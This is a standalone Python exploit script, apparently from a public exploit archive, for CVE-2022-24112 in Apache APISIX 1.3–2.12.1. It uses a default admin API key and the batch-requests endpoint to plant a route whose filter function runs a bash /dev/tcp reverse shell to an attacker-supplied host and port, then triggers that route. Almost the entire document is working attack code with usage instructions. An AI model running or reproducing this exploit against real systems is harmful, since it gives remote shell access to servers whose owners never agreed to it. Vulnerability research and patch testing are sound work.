# Exploit Title: Apache APISIX 2.12.1 - Remote Code Execution (RCE) # Date: 2022-03-16 # Exploit Author: Ven3xy # Vendor Homepage: https://apisix.apache.org/ # Version: Apache APISIX 1.3 – 2.12.1 # Tested on: CentOS 7 # CVE : CVE-2022-24112 import requests import sys class color: HEADER = '\033[95m' IMPORTANT = '\33[35m' NOTICE = '\033[33m' OKBLUE = '\033[94m' OKGREEN = '\033[92m' WARNING = '\033[93m' RED = '\033[91m' END = '\033[0m' UNDERLINE = '\033[4m' LOGGING = '\33[34m' color_random=[color.HEADER,color.IMPORTANT,color.NOTICE,color.OKBLUE,color.OKGREEN,color.WARNING,color.RED,color.END,color.UNDERLINE,color.LOGGING] def banner(): run = color_random[6]+'''\n . , _.._ * __*\./ ___ _ \./._ | _ *-+- (_][_)|_) |/'\ (/,/'\[_)|(_)| | | | \n''' run2 = color_random[2]+'''\t\t(CVE-2022-24112)\n''' run3 = color_random[4]+'''{ Coded By: Ven3xy | Github: https://github.com/M4xSec/ }\n\n''' print(run+run2+run3) if (len(sys.argv) != 4): banner() print("[!] Usage : ./apisix-exploit.py ") exit() else: banner() target_url = sys.argv[1] lhost = sys.argv[2] lport = sys.argv[3] headers1 = { 'Host': '127.0.0.1:8080', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69', 'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1', 'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/json', 'Content-Length': '540', 'Connection': 'close', } headers2 = { 'Host': '127.0.0.1:8080', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69', 'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1', 'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/json', 'Connection': 'close', } json_data = { 'headers': { 'X-Real-IP': '127.0.0.1', 'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1', 'Content-Type': 'application/json', }, 'timeout': 1500, 'pipeline': [ { 'path': '/apisix/admin/routes/index', 'method': 'PUT', 'body': '{"uri":"/rms/fzxewh","upstream":{"type":"roundrobin","nodes":{"schmidt-schaefer.com":1}},"name":"wthtzv","filter_func":"function(vars) os.execute(\'bash -c \\\\\\"0<&160-;exec 160<>/dev/tcp/'+lhost+'/'+lport+';sh <&160 >&160 2>&160\\\\\\"\'); return true end"}', }, ], } response1 = requests.post(target_url+'apisix/batch-requests', headers=headers1, json=json_data, verify=False) response2 = requests.get(target_url+'rms/fzxewh', headers=headers2, verify=False)